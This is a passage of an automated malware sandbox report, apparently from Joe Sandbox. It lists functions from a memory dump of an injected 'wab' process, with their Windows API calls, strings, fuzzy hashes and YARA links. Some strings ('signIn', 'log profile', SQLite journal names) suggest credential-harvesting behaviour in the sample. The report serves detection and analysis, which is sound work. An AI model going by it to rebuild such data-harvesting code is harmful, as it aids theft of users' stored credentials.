                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3015003838-0
                                                                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E44
                                                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                                                • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 59245283-0
                                                                                                                • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 3467550082-0
                                                                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID: 3A
                                                                                                                • API String ID: 3300951397-293699754
                                                                                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                • memcpy.MSVCRT ref: 0040D24C
                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: AE$.cfg$General$EA
                                                                                                                • API String ID: 776488737-1622828088
                                                                                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                • memset.MSVCRT ref: 0040D906
                                                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: -journal$-wal
                                                                                                                • API String ID: 438689982-2894717839
                                                                                                                • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3975816621-0
                                                                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                                                • API String ID: 1214746602-2708368587
                                                                                                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2313361498-0
                                                                                                                • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                                                • String ID:
                                                                                                                • API String ID: 2047574939-0
                                                                                                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 4218492932-0
                                                                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                • memcpy.MSVCRT ref: 0044A90C
                                                                                                                • memcpy.MSVCRT ref: 0044A988
                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                • memcpy.MSVCRT ref: 0044AA19
                                                                                                                • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: gj
                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                • API String ID: 3510742995-2446657581
                                                                                                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4281309102-0
                                                                                                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
